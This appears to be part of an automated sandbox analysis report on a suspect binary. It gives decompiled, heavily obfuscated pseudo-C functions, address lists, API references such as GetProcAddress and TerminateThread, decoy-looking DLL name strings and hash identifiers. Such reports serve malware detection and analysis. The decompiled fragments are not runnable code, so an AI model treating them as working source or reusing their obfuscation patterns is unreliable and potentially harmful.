Function 004A5A46 Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004A5A46() {
				char _t1;
				char* _t4;
				void* _t5;
				intOrPtr _t8;
				void* _t9;
				void* _t10;

				_t8 =  *0x4fd1f8; // 0x94c1
				 *0x4fff19 = _t1;
				E0049D0D9(_t4, _t5, _t8, _t9, _t10 + _t10);
				_push(E004A5A7A);
				goto ( *0x4fe2b3);
			}

0x004a5a4d
0x004a5a54
0x004a5a5f
0x004a5a69
0x004a5a74

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fda96a5cd78541834190e422b572a7b601b17cb6a91ef6d8d4f576c42b2260c
Instruction ID: 4db1702a11544f9a720625afdcc2f32c719bf9657a7f48a89e329d2bcc3e3b9b
Opcode Fuzzy Hash: 4fda96a5cd78541834190e422b572a7b601b17cb6a91ef6d8d4f576c42b2260c
Instruction Fuzzy Hash: 8AD012AAE44201EAC604AF71FEC41B03B33BB21B2930100BBE806222B2E6691961C35C

Uniqueness

Uniqueness Score: -1.00%

Function 004B9AD7 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2ae48f3103d25b18810684aa6c4c8fb3f09bcfa4ad59870f7c2a5f70747260d
Instruction ID: b6dc42b82a394dbbc488f0e97f3f2bee1fa1de430cdd5a30f4db17d1c86f2d55
Opcode Fuzzy Hash: a2ae48f3103d25b18810684aa6c4c8fb3f09bcfa4ad59870f7c2a5f70747260d
Instruction Fuzzy Hash: 29B09230E84188EEAB048B819C80C793636E3042447200074A200010E0EAB00D20DB18

Uniqueness

Uniqueness Score: -1.00%

Function 004B9AC3 Relevance: .0, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E004B9AC3() {
				void* _t3;

				_push( *((intOrPtr*)(_t3 - 8)));
				_push(E004B9AD7);
				goto ( *0x4fdf57);
			}

0x004b9ac3
0x004b9ac6
0x004b9ad1

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86f61c4510054a61e1d6480338970504b8edda22e4e0db28ee2be3ce124f3616
Instruction ID: 39f6bdecbe4be17261d184b9c99bfc66d71d81971946d245d6b297b7e4bb1bb0
Opcode Fuzzy Hash: 86f61c4510054a61e1d6480338970504b8edda22e4e0db28ee2be3ce124f3616
Instruction Fuzzy Hash: E0B00175A44188EB8B098B80EC55EA8BB33EB48705F1400A5D21A965B0C7B92960EB2C

Uniqueness

Uniqueness Score: -1.00%

Function 0047E0DC Relevance: 24.8, APIs: 1, Strings: 13, Instructions: 254libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 0047E1E1

Strings

%8, xrefs: 0047E45A
scrptadm.dll, xrefs: 0047E27E, 0047E406
sqlsrv32.dll, xrefs: 0047E0E2
Pt>, xrefs: 0047E129
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 0047E157
msobjs.dll, xrefs: 0047E12E
RegQueryInfoKeyW, xrefs: 0047E33D, 0047E3C3
RegQueryInfoKeyW, xrefs: 0047E108
[+9, xrefs: 0047E32B
ZG', xrefs: 0047E276
TpWaitForAlpcCompletion, xrefs: 0047E3ED
mtxclu.dll, xrefs: 0047E16F, 0047E22C, 0047E333
user.exe, xrefs: 0047E2E0

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: %8$Pt>$RegQueryInfoKeyW$RegQueryInfoKeyW$TpWaitForAlpcCompletion$ZG'$[+9$api-ms-win-core-libraryloader-l1-1-0.dll$msobjs.dll$mtxclu.dll$scrptadm.dll$sqlsrv32.dll$user.exe
API String ID: 190572456-355695662
Opcode ID: 5f9684457bb4f372713bcea2f601bd6b665a8a152d15886181908c15d03697c6
Instruction ID: 66adacad9124f71fb0f9c6cd5fa3fce1495bf742dac2baf2800b4087fce7654d
Opcode Fuzzy Hash: 5f9684457bb4f372713bcea2f601bd6b665a8a152d15886181908c15d03697c6
Instruction Fuzzy Hash: 63A15C74E103099BDB00EFA9E9D05E97BB2EF1D324F0081BADA4997322E3791A55C74D

Uniqueness

Uniqueness Score: -1.00%

Function 004D3036 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 278sleepthreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(?), ref: 004D3148
Sleep.KERNEL32(0000031A), ref: 004D360A

Strings

imagesp1.dll, xrefs: 004D3043
psapi.dll, xrefs: 004D3675
MXEAgent.dll, xrefs: 004D33D0
speechuxcpl.dll, xrefs: 004D31B1, 004D3515
CNHI06S.DLL, xrefs: 004D322F
RtlSecondsSince1970ToTime, xrefs: 004D3614
0eqt, xrefs: 004D3148
deskperf.dll, xrefs: 004D3693
scavengeui.dll, xrefs: 004D3582
RegQueryInfoKeyW, xrefs: 004D366A
disrvpp.dll, xrefs: 004D30B8

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: SleepTerminateThread
String ID: 0eqt$CNHI06S.DLL$MXEAgent.dll$RegQueryInfoKeyW$RtlSecondsSince1970ToTime$deskperf.dll$disrvpp.dll$imagesp1.dll$psapi.dll$scavengeui.dll$speechuxcpl.dll
API String ID: 480259992-3384724360
Opcode ID: 65fe88b3843e2066801022b69ee332bdfac5dde48a393a1476c36fddddb57788
Instruction ID: bf77a28b4bdf498d4bff454d83b431bbd11d1f3874a44d1ff07b2ec51ecda84c
Opcode Fuzzy Hash: 65fe88b3843e2066801022b69ee332bdfac5dde48a393a1476c36fddddb57788
Instruction Fuzzy Hash: 2EB1E361E143498FCB00DFB9E8942ED7BB1EF2A310F04817BCA45A7766E2380A55C76D

Uniqueness

Uniqueness Score: -1.00%

Function 004906F7 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 257libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?), ref: 004907FF

Strings

CreateActCtxW, xrefs: 00490701
psapi.dll, xrefs: 004907D1
MXEAgent.dll, xrefs: 0049084D
manage-bde.exe, xrefs: 0049083A
MXEAgent.dll, xrefs: 004908BE, 00490A8C
PD>, xrefs: 00490A1F
O`,, xrefs: 004909B2
CNBBR334.DLL, xrefs: 00490AB1, 00490ABD
scavengeui.dll, xrefs: 0049097A
RegQueryInfoKeyW, xrefs: 0049078A, 004908E8
`Nqt, xrefs: 0049087D

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: CNBBR334.DLL$CreateActCtxW$MXEAgent.dll$MXEAgent.dll$O`,$PD>$RegQueryInfoKeyW$`Nqt$manage-bde.exe$psapi.dll$scavengeui.dll
API String ID: 190572456-2382029534
Opcode ID: c315b7d59b25d5397b66ae956b69d4275b902e983a80595dfb7aa6cf5520040e
Instruction ID: c0ef425350918672a8d953a0d8770c552880f198e5959dfd5790a3c9206f8f56
Opcode Fuzzy Hash: c315b7d59b25d5397b66ae956b69d4275b902e983a80595dfb7aa6cf5520040e
Instruction Fuzzy Hash: 1BA1AF35E042099FCB00EFB9E9945E97FB2EF29314F04817BD94597326E2380A54CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004729EB Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 365
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E004729EB(void* __ebx, intOrPtr __ecx, short __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t82;
				char* _t84;
				char* _t85;
				char* _t87;
				char* _t88;
				char* _t91;
				char* _t96;
				char* _t98;
				char* _t100;
				char* _t103;
				char* _t105;
				char* _t108;
				void* _t115;
				void* _t121;
				char* _t147;
				char* _t155;
				char* _t158;
				intOrPtr _t187;
				intOrPtr _t188;
				char* _t192;
				short _t193;
				short _t201;
				short _t213;
				signed int _t215;
				signed short _t217;
				signed short _t220;
				signed short _t221;
				signed short _t237;
				intOrPtr _t240;
				void* _t241;
				signed short _t242;
				void* _t243;

				_t236 = __edi;
				_t213 = __edx;
				_t187 = __ecx;
				L0045EEBA(__ebx, __edx, __edi, __esi);
				 *0x4fd13a = _t187;
				_t188 =  *0x4fd16e; // 0x0
				 *0x4fd1d4 = __edx;
				_t82 = GetProcAddress(??, ??);
				if((_t213 + 0x00000001 & 0x0000a337) >= 0) {
					 *0x4fff1d = _t82;
					_t236 = __edi - 0xd918b3;
					 *0x4fd517 = _t82;
					if(_t82 > 0x1b1b96) {
						 *(_t243 - 8) = 0x222dd8;
						 *(_t243 - 8) = 0x222dd8;
					}
					 *0x4fd142 = _t188;
					_t188 =  *0x4fd190; // 0xb97d
				}
				_t215 = 0;
				_t240 =  *0x4fd22a; // 0x6ff8
				 *0x4fd9f3 = _t82;
				_t237 = _t236 - 0xdaf871;
				if(_t82 >= 0xb24b) {
				}
				_t115 = _t82 - 0x3015;
				 *(_t243 - 8) = _t82;
				_push(_t115);
				_push(1);
				_push(0);
				L004618BC(_t82, _t215);
				_t84 =  *(_t243 - 8);
				 *(_t243 - 8) = _t84;
				if(_t115 - 0x48c8 != 0x34) {
					 *0x4fd13a =  *0x4fd13a - _t188;
					if(_t188 <= _t188) {
						_t188 = 0xffffffffffffffff;
						 *0x4fd1d2 =  !_t215;
						_t215 =  *0x4fd208; // 0x9966
						 *0x4fff1b = _t84;
						_t84 =  &(_t84[_t84]);
						_t240 = _t240 + 0xc26ee5;
						 *0x4fff1e = _t84;
						_t237 = _t237 & 0x000000fd;
					}
					 *0x4fd7bf =  &(_t84[0xb840a]);
				}
				if(_t188 != _t188) {
					_t188 = 0x6b74;
				}
				 *0x4fd18c = _t188;
				_t217 =  *0x4fd1d6; // 0x64fd
				_t85 =  *(_t243 - 8);
				_push(0);
				 *0x4fff1e = _t85;
				 *(_t243 - 8) = _t85;
				_t121 = 0x3ee398;
				_t87 =  *(_t243 - 8);
				if(0x3ee398 < _t215) {
					L17:
					_t121 = 0x2a9cb1;
					goto L18;
				} else {
					 *((intOrPtr*)(_t243 - 0x10)) =  *((intOrPtr*)(_t243 - 0x10));
					 *((intOrPtr*)(_t243 - 0x10)) =  *((intOrPtr*)(_t243 - 0x10));
					if((_t217 & 0x00008532) < 0) {
						L18:
						 *(_t243 - 8) =  *(_t243 - 8) - _t121;
						 *0x4fff16 =  *0x4fff16 - 0x5ed1;
						 *0x4fd1fa = 0x5ed0;
						_push( *0x4fd0c4);
						if(_t87 == 0) {
							_t237 =  !_t237;
							 *0x4fff1d = _t87;
						}
						 *(_t243 - 8) = _t87;
						_t88 =  *(_t243 - 8);
						_t192 =  *(_t243 - 0xc);
						 *(_t243 - 8) = _t88;
						if("mtxclu.dll" >= 0x33) {
							 *(_t243 - 0xc) =  &(( *(_t243 - 0xc))[_t192]);
							_t192 = 0x7b;
							if(0x8859a9 >= 0) {
								 *0x4fff1b = _t88;
							}
						}
						_t91 =  *(_t243 - 8);
						_push( *0x4fd0c4);
						if("MXEAgent.dll" + _t192 == "MXEAgent.dll" + _t192) {
							 *0x4fd15a = _t192;
						}
						 *(_t243 - 8) = _t91;
						_push(_t91);
						_push(1);
						L0045F957(_t91, _t240);
						 *(_t243 - 0xc) = 0x4572b2;
						_t193 =  *0x4fd142; // 0x63d5
						_push( *0x4fd032);
						 *0x4fd0ce =  *0x4fd0ce - 0x2bf947;
						_t96 =  *(_t243 - 8);
						if(0x2bf947 <= 0x2bf947) {
							_t193 = 0x6838;
						}
						 *((intOrPtr*)(_t243 - 0x10)) =  *((intOrPtr*)(_t243 - 0x10)) - _t193;
						 *0x4fd182 = _t193;
						_t220 = 0x8fa4;
						_push( *0x4fd018);
						 *0x4fff1b = _t96;
						_t241 = 0;
						 *(_t243 - 8) = _t96;
						_t98 =  *(_t243 - 8);
						if(0x2bf947 >= 0x35db26) {
							L30:
							_t237 = _t237;
							_t135 = 0x136fba;
							if(_t98 <= 0x21943f) {
								_t135 =  *(_t243 - 8) - 0x46;
							}
							 *0x4fff15 =  *0x4fff15 - _t135;
							goto L33;
						} else {
							_t135 =  *(_t243 - 0xc) - 0x4b11ed;
							 *0x4fd13c =  *0x4fd13c + _t193;
							_t193 =  *0x4fd18c; // 0x7a01
							if(0x8aa4 >= 0) {
								L33:
								_push( *0x4fd09e);
								if(_t135 - _t135 != _t135 - _t135) {
									L35:
									_t221 =  *0x4fd1ac; // 0x6d46
									_t220 = _t221 - 0x94de;
									L36:
									 *0x4fd1f8 = _t220;
									_push( *0x4fd0ba);
									 *(_t243 - 8) = _t98;
									 *(_t243 - 0xc) = "ehshell.dll";
									_t195 = _t193 - 0x5fc4 + 0x67a6;
									_t100 =  *(_t243 - 8);
									if(_t193 - 0x5fc4 + 0x67a6 >= _t193 - 0x5fc4 + 0x67a6) {
										if((_t220 & 0x00008f12) > 0) {
											 *0x4fff18 =  *0x4fff18 - _t220;
										}
										 *0x4fd21a = _t220;
									}
									_push( *0x4fd1b8);
									 *0x4fff1b = _t100;
									_t242 = _t241 + _t241;
									 *(_t243 - 8) = _t100;
									 *0x4fd0d2 =  *0x4fd0d2 - 0xffffffffffd2aaed;
									L004618E3( *(_t243 - 8), 0xffffffffffd2aaed, _t195, _t220, _t237, _t242, 0xffffffffffd2aaed, 0xffffffffffd2aaed);
									_t103 =  *(_t243 - 8);
									if(0x3d5a20 < 0x3d5a20) {
										L45:
										if(_t237 <= 0) {
											 *0x4fd513 =  *0x4fd513 + _t103;
										}
										 *0x4fd63b = _t103;
										_t147 = 0x30257a;
										goto L48;
									} else {
										_t195 = 0x67c7ad;
										 *0x4fd1a6 = _t220;
										if((_t220 & 0x00008b5d) == 0) {
											L44:
											_t237 = _t237 + _t237;
											goto L45;
										}
										_t220 = 0xa305;
										 *0x4fff19 = _t103;
										_t158 =  *0x4fff1b; // 0x0
										_t147 = _t158 - 0xce;
										if((_t237 & _t242) != 0) {
											L48:
											 *(_t243 - 8) = _t147;
											_push( *0x4fd0d4);
											 *0x4fd1ac = _t220;
											 *0x4fd1c8 = _t220;
											_push( *0x4fd062);
											if(0x7db0 == 0x7db0) {
											}
											 *(_t243 - 8) = _t103;
											 *0x4fd134 =  *0x4fd134 - 0x7db0;
											_t155 =  *(_t243 - 0xc);
											_t105 =  *(_t243 - 8);
											_t201 = 0x6254;
											_push( *0x4fd106);
											if(_t155 == _t155) {
												_t155 = "sqlsrv32.dll";
											}
											if(_t201 >= _t201) {
												_t201 = 0x7324;
											}
											 *(_t243 - 8) = _t105;
											 *(_t243 - 8) = _t155;
											 *(_t243 - 8) = _t155;
											 *0x4fda67 = _t155;
											_t108 =  *(_t243 - 8);
											_push( *0x4fd148);
											 *0x4fff14 =  *0x4fff14 + _t155;
											if(_t201 >= _t201 || _t201 > _t201) {
												 *0x4fd17c = _t201;
											}
											 *0x4fd214 = 0x9db2;
											_push(0x472f84);
											_push(E004F4B5F);
											return _t108;
										}
										 *0x4fff1d =  *0x4fff1d + _t103;
										goto L44;
									}
								}
								_t193 = _t193 + 0x5403ee;
								if(_t193 != _t193) {
									goto L36;
								}
								goto L35;
							}
							 *0x4fd1d6 = 0x8fa4;
							 *0x4fd1f2 = 0x8fa4;
							 *0x4fff1b = _t98;
							_t241 = 0;
							 *0x4fff1e = _t98;
							goto L30;
						}
					}
					if((_t217 & 0x000094f7) < 0) {
						 *0x4fff18 =  *0x4fff18 + _t217;
						 *0x4fff19 = _t87;
						_t121 = 0xd8;
						 *0x4fd6f1 =  *0x4fd6f1 + _t237;
					}
					_t237 = 0x4fd73b;
					 *0x4fd553 = _t87;
					goto L17;
				}
			}

0x004729eb
0x004729eb
0x004729eb
0x004729eb
0x004729f6
0x00472a00
0x00472a07
0x00472a0e
0x00472a1a
0x00472a26
0x00472a2d
0x00472a33
0x00472a3d
0x00472a44
0x00472a47
0x00472a47
0x00472a52
0x00472a5c
0x00472a63
0x00472a69
0x00472a6e
0x00472a77
0x00472a7c
0x00472a87
0x00472a87
0x00472a8e
0x00472a93
0x00472a96
0x00472a97
0x00472a99
0x00472a9b
0x00472aa0
0x00472aa8
0x00472aae
0x00472abc
0x00472ac5
0x00472aca
0x00472acd
0x00472ad7
0x00472ade
0x00472ae4
0x00472ae6
0x00472aec
0x00472af1
0x00472af1
0x00472afc
0x00472b03
0x00472b12
0x00472b14
0x00472b14
0x00472b18
0x00472b29
0x00472b30
0x00472b33
0x00472b37
0x00472b3c
0x00472b46
0x00472b4b
0x00472b50
0x00472b9f
0x00472b9f
0x00000000
0x00472b52
0x00472b57
0x00472b5a
0x00472b62
0x00472ba4
0x00472ba4
0x00472bb0
0x00472bbc
0x00472bc3
0x00472bcc
0x00472bce
0x00472bd0
0x00472bdd
0x00472be2
0x00472bea
0x00472bf4
0x00472bf7
0x00472bfd
0x00472c09
0x00472c11
0x00472c21
0x00472c27
0x00472c2f
0x00472c21
0x00472c49
0x00472c55
0x00472c5e
0x00472c60
0x00472c67
0x00472c6e
0x00472c71
0x00472c72
0x00472c74
0x00472c87
0x00472c8d
0x00472c9f
0x00472cb3
0x00472cba
0x00472cbf
0x00472cc4
0x00472cc4
0x00472cc8
0x00472ccb
0x00472cd5
0x00472cd9
0x00472ce0
0x00472ce6
0x00472ce8
0x00472cf0
0x00472cf9
0x00472d44
0x00472d44
0x00472d4c
0x00472d56
0x00472d5d
0x00472d5d
0x00472d60
0x00000000
0x00472cfb
0x00472cfe
0x00472d04
0x00472d10
0x00472d1c
0x00472d69
0x00472d69
0x00472d74
0x00472d86
0x00472d86
0x00472d8d
0x00472d92
0x00472d92
0x00472d99
0x00472da3
0x00472db0
0x00472dbb
0x00472dc0
0x00472dc5
0x00472dcf
0x00472dd1
0x00472dd1
0x00472dd7
0x00472dd7
0x00472de8
0x00472def
0x00472df5
0x00472df8
0x00472e01
0x00472e12
0x00472e22
0x00472e27
0x00472e70
0x00472e72
0x00472e74
0x00472e74
0x00472e7a
0x00472e82
0x00000000
0x00472e2c
0x00472e2f
0x00472e35
0x00472e41
0x00472e68
0x00472e68
0x00000000
0x00472e6a
0x00472e4a
0x00472e4e
0x00472e54
0x00472e5a
0x00472e60
0x00472e87
0x00472e87
0x00472e8a
0x00472ea6
0x00472ead
0x00472eba
0x00472ec3
0x00472ec3
0x00472ece
0x00472ede
0x00472efe
0x00472f01
0x00472f04
0x00472f08
0x00472f11
0x00472f13
0x00472f13
0x00472f1a
0x00472f1f
0x00472f1f
0x00472f23
0x00472f2e
0x00472f31
0x00472f37
0x00472f3d
0x00472f40
0x00472f47
0x00472f52
0x00472f59
0x00472f59
0x00472f6f
0x00472f79
0x00472f7e
0x00472f83
0x00472f83
0x00472e62
0x00000000
0x00472e62
0x00472e27
0x00472d76
0x00472d7e
0x00000000
0x00000000
0x00000000
0x00472d7e
0x00472d1e
0x00472d25
0x00472d31
0x00472d37
0x00472d3f
0x00000000
0x00472d3f
0x00472cf9
0x00472b69
0x00472b6b
0x00472b71
0x00472b7f
0x00472b81
0x00472b81
0x00472b8a
0x00472b96
0x00000000
0x00472b9d

APIs

GetProcAddress.KERNEL32 ref: 00472A0E

Strings

$!, xrefs: 00472BDD
z%0, xrefs: 00472E82
scrptadm.dll, xrefs: 00472EF3
sqlsrv32.dll, xrefs: 00472F13
ehshell.dll, xrefs: 00472DAB
MXEAgent.dll, xrefs: 00472B09, 00472C4C
mtxclu.dll, xrefs: 00472BED
d6, xrefs: 00472C79
Z=, xrefs: 00472E1D
msobjs.dll, xrefs: 00472E94

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: d6$ Z=$$!$MXEAgent.dll$ehshell.dll$msobjs.dll$mtxclu.dll$scrptadm.dll$sqlsrv32.dll$z%0
API String ID: 190572456-1385075519
Opcode ID: ae5d9e8adeba9b8b056ec82ef0933dc73cbd3b713cbcc6abef86f821c4e446b7
Instruction ID: b4e0ca8cbd09a1e992e88949adbd7804aae031e3ee494aba5c11280937186b42
Opcode Fuzzy Hash: ae5d9e8adeba9b8b056ec82ef0933dc73cbd3b713cbcc6abef86f821c4e446b7
Instruction Fuzzy Hash: 5CE1BF65E142069FCB00EFB8F9942EE7BB2EF2A314F04807BD94997321E2790A54C75D

Uniqueness

Uniqueness Score: -1.00%

Function 004DDC57 Relevance: 18.3, APIs: 1, Strings: 11, Instructions: 287
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E004DDC57(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t91;
				char _t97;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t110;
				signed int _t116;
				signed int _t121;
				signed int _t124;
				signed int _t126;
				intOrPtr _t146;
				signed int _t149;
				signed int _t151;
				void* _t162;
				signed int _t183;
				void* _t185;
				signed int _t198;
				signed int _t203;
				signed int _t206;
				signed int _t208;
				void* _t215;
				short _t219;
				signed short _t220;
				short _t222;
				void* _t224;
				intOrPtr _t243;
				void* _t245;
				void* _t247;
				signed int _t251;
				void* _t252;

				_t245 = __edi;
				 *(_t252 - 0x10) = __eax;
				 *(_t252 - 0x70) =  *(_t252 - 0x10);
				_t82 =  *(_t252 - 0x70);
				_t219 = __edx + 0x9187fd;
				 *0x4fff19 = _t82;
				_t251 = __esi + 1 - 0xb4e348;
				 *0x4fd6e9 =  *0x4fd6e9 + __edi;
				 *0x4fd705 =  *0x4fd705 + __edi;
				 *(_t252 - 8) = _t82;
				 *(_t252 - 0xc) =  !_t82;
				_t146 = _t82 + _t82 - 0x34ed;
				 *((intOrPtr*)(_t252 - 0x14)) = _t146;
				E004D8683(_t219, __edi, "CNHI06S.DLL" + "CNHI06S.DLL");
				_t149 =  !(_t146 - 0x38 + 1);
				 *0x4fd194 = _t219;
				_t91 =  *(_t252 - 8);
				if( *((intOrPtr*)(_t91 + 4)) != 0) {
					_t151 =  *(_t252 - 0xc);
					 *(_t252 - 8) = _t91;
					_t220 = _t219 + _t219;
					 *(_t252 - 8) =  *(_t252 - 0x58);
					 *(_t252 - 0x10) = 0x1e5739;
					if(_t151 > 0x2c7bbe) {
						L9:
						_t97 =  *0x4fff1b; // 0x0
						 *0x4fff1e = _t97;
						_t245 = _t245 + _t245;
					} else {
						 *((intOrPtr*)(_t252 - 0x1c)) =  *((intOrPtr*)(_t252 - 0x1c)) - _t151;
						 *(_t252 - 0x20) = 0x6653;
						 *0x4fd134 = 0x6653;
						if((_t220 & 0x00008071) >= 0) {
							_t251 = _t251 | _t251;
							goto L9;
						}
					}
					_t198 =  *(_t252 - 0x70);
					 *(_t252 - 0x20) = _t198;
					 *0x4fd18c = _t198 + _t198 + 1;
					_t104 =  *(_t252 - 8);
					if(_t104 <= 0xe5a) {
						 *0x4fd15c = 0x5550;
					}
					 *(_t252 - 8) = _t104;
					_t106 =  *(_t252 - 8);
					 *(_t252 - 8) = _t106;
					_push(_t106);
					_push(_t106);
					L0045F957(_t106, _t251);
					_t108 =  *(_t252 - 8);
					_t203 =  *( *(_t252 - 0x20));
					_t222 =  *0x4fd166; // 0x71
					 *0x4fd1b4 = _t222;
					 *0x4fd1ce = _t222;
					 *(_t252 - 8) = _t108;
					if(_t108 <= 0x1a6b) {
						 *0x4fd186 = _t203;
						_t222 = _t222 + 0x575603 - _t222 + 0x575603;
					}
					 *(_t252 - 0x20) = _t203;
					 *((intOrPtr*)(_t252 - 0x24)) =  *((intOrPtr*)(_t252 - 0x24)) - _t203;
					_t206 =  *(_t252 - 0x20);
					_t224 = _t206;
					_t110 =  *(_t252 - 8) + _t224;
					 *(_t252 - 0x20) = _t206;
					 *0x4fd1da =  *0x4fd1da - 0x8bef;
					_t208 =  *(_t252 - 0x20);
					 *(_t252 - 0x6c) = _t110;
					_t247 = _t245 + 0xcf0940 - 1;
					 *0x4fff10 = _t110;
					_t162 = (_t110 - 0x00001ae4 | 0x00002aa9) + (_t110 - 0x00001ae4 | 0x00002aa9);
					if(_t162 < _t162) {
						L18:
						 *0x4fd2d5 =  *0x4fd2d5 - _t251;
					} else {
						if(_t162 > _t162) {
							 *0x4fff15 =  *0x4fff15 + _t208;
						}
						 *0x4fd1d2 =  *0x4fd1d2 - 0x8946;
						if((_t251 & 0x009e794f) <= 0) {
							goto L18;
						}
					}
					if(_t247 == 0) {
						 *((intOrPtr*)(_t252 - 0x1c)) = 0x35574d;
					}
					 *0x4fd18a = _t208;
					 *(_t252 - 8) =  *(_t252 - 0x6c);
					 *(_t252 - 0x10) = 0x1aee02;
					 *(_t252 - 0x20) = _t208;
					_push(_t208);
					_push(1);
					_push(0);
					_push(E004DE056);
					_push(E0049E758);
					return 0x1aee02;
				} else {
					 *((intOrPtr*)(_t252 - 0x28)) =  *((intOrPtr*)(_t252 - 0x28)) - 0x6654;
					 *(_t252 - 8) = _t91;
					_t116 =  *(_t252 - 8);
					if(_t149 == 0x36) {
						_t149 = 0xffffffffffbae445;
						E004FD13E = 0x6653;
					}
					 *(_t252 - 8) = _t116;
					_push("CNHI06S.DLL");
					_push(0);
					E004A52AC(_t245);
					_push(0x7f);
					 *((intOrPtr*)(_t252 - 0x1c)) =  *((intOrPtr*)(_t252 - 0x1c)) + 0x40d916;
					_t121 =  *(_t252 - 8);
					_t215 = 0xf847;
					 *(_t252 - 8) = _t121;
					_push(_t121);
					_push(_t121);
					L004DC85C();
					_t124 =  *(_t252 - 8);
					if(0x40d916 >= 0x40d916) {
						_t215 = 0x4fed7a;
						 *0x4fd168 = 0x7c5c;
					}
					_t183 =  *0x4fff19; // -107
					SetLastError(??);
					_t243 =  *0x4fd1ec; // 0x8eab
					 *(_t252 - 8) = _t124;
					_t126 =  *(_t252 - 8);
					_t185 = _t183 + _t126 + 0x34;
					 *(_t252 - 8) = _t126;
					E0049DAF1(E004B3B9D(_t243 - 0x9793ef, _t245, _t251), _t185, _t215, _t243 - 0x9793ef, _t245, _t251, _t128, 0, 1);
					 *0x4fff12 =  *0x4fff12 + _t185;
					return 0;
				}
			}

0x004ddc57
0x004ddc57
0x004ddc69
0x004ddc7c
0x004ddc7f
0x004ddc86
0x004ddc8e
0x004ddc94
0x004ddc9b
0x004ddca4
0x004ddca9
0x004ddcaf
0x004ddcc1
0x004ddcd0
0x004ddcd9
0x004ddce8
0x004ddcef
0x004ddcf6
0x004dde1e
0x004dde20
0x004dde2e
0x004dde31
0x004dde39
0x004dde42
0x004dde73
0x004dde79
0x004dde7f
0x004dde86
0x004dde44
0x004dde4a
0x004dde4d
0x004dde50
0x004dde63
0x004dde6f
0x00000000
0x004dde6f
0x004dde63
0x004dde95
0x004ddeb3
0x004ddeb9
0x004ddec3
0x004ddeca
0x004ddee4
0x004ddee4
0x004ddef1
0x004ddef9
0x004ddeff
0x004ddf02
0x004ddf03
0x004ddf04
0x004ddf09
0x004ddf11
0x004ddf13
0x004ddf1a
0x004ddf21
0x004ddf28
0x004ddf2f
0x004ddf49
0x004ddf50
0x004ddf50
0x004ddf57
0x004ddf5a
0x004ddf69
0x004ddf6d
0x004ddf6e
0x004ddf75
0x004ddf86
0x004ddf8d
0x004ddf90
0x004ddf99
0x004ddf9a
0x004ddfac
0x004ddfb1
0x004ddfeb
0x004ddfeb
0x004ddfb3
0x004ddfb6
0x004ddfb8
0x004ddfb8
0x004ddfd3
0x004ddfe9
0x00000000
0x00000000
0x004ddfe9
0x004ddfff
0x004de019
0x004de019
0x004de022
0x004de038
0x004de040
0x004de043
0x004de046
0x004de047
0x004de049
0x004de04b
0x004de050
0x004de055
0x004ddcfc
0x004ddcfd
0x004ddd08
0x004ddd13
0x004ddd19
0x004ddd1d
0x004ddd23
0x004ddd2a
0x004ddd31
0x004ddd39
0x004ddd3a
0x004ddd3c
0x004ddd44
0x004ddd5d
0x004ddd60
0x004ddd66
0x004ddd69
0x004ddd6c
0x004ddd6d
0x004ddd6e
0x004ddd7b
0x004ddd80
0x004ddd84
0x004ddd89
0x004ddd93
0x004ddd9e
0x004ddda4
0x004dddad
0x004dddba
0x004dddbf
0x004dddc5
0x004dddc8
0x004dddd8
0x004ddddd
0x004df761
0x004df761

APIs

SetLastError.KERNEL32(?,?,0000007F,00000000,CNHI06S.DLL), ref: 004DDDA4

Strings

psapi.dll, xrefs: 004DDEA4, 004DE009
[/f, xrefs: 004DDC94
MXEAgent.dll, xrefs: 004DDF37
CoRevokeInitializeSpy, xrefs: 004DDED4
CNHI06S.DLL, xrefs: 004DDCC7, 004DDCCF, 004DDD34, 004DDD39
0Lqt, xrefs: 004DDDA4
RtlSecondsSince1970ToTime, xrefs: 004DDE8A
